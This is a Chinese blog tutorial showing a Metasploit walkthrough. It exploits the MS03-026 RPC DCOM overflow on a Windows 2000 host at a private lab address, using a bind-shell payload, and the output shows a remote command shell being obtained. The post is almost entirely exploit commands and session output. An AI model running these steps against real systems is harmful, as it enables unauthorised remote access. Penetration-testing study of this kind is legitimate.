利用msfconsole渗透攻击windows 2000

1.利用Nessus扫描该windows 2000的机器,发现有些高危的漏洞

比如:MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146)

然后打开msfconsole

msf > search ms03-026

Matching Modules
================

   Name                                  Disclosure Date  Rank   Check  Description
   ----                                  ---------------  ----   -----  -----------
   exploit/windows/dcerpc/ms03_026_dcom  2003-07-16       great  No     MS03-026 Microsoft RPC DCOM Interface Overflow


msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > show payloads
msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 10.26.33.111
RHOST => 10.26.33.111
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.26.33.111     yes       The target address
   RPORT  135              yes       The target port (TCP)


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.26.33.111     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > run

[*] 10.26.33.111:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 10.26.33.111:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Sending exploit ...
[*] Started bind TCP handler against 10.26.33.111:4444
[*] Command shell session 1 opened (10.26.30.41:36675 -> 10.26.33.111:4444) at 2018-12-11 19:33:33 +0800



C:\WINNT\system32>d:    
d:

D:\>dir
dir
   ZRMPSEL_CN
  EAB5-D65E

 D:\ ¼

2003-06-26  20:00                   45 AUTORUN.INF
2003-06-26  20:00       <DIR>          BOOTDISK
2003-06-26  20:00              304,624 BOOTFONT.BIN
2003-06-26  20:00                    0 CDROMSP4.TST
2003-06-26  20:00                    5 CDROM_IP.5
2003-06-26  20:00                    5 CDROM_NT.5
2003-06-26  20:00       <DIR>          DISCOVER
2003-06-26  20:00       <DIR>          I386
2003-06-26  20:00               12,354 READ1ST.TXT
2003-06-26  20:00              465,408 README.DOC
2003-06-26  20:00              358,160 SETUP.EXE
2003-06-26  20:00       <DIR>          SETUPTXT
2003-06-26  20:00               18,173 SPNOTES.HTM
2003-06-26  20:00       <DIR>          SUPPORT
2003-06-26  20:00       <DIR>          VALUEADD
               9     1,158,774 

               6 ¼              0 

 

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

羊族的希望

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值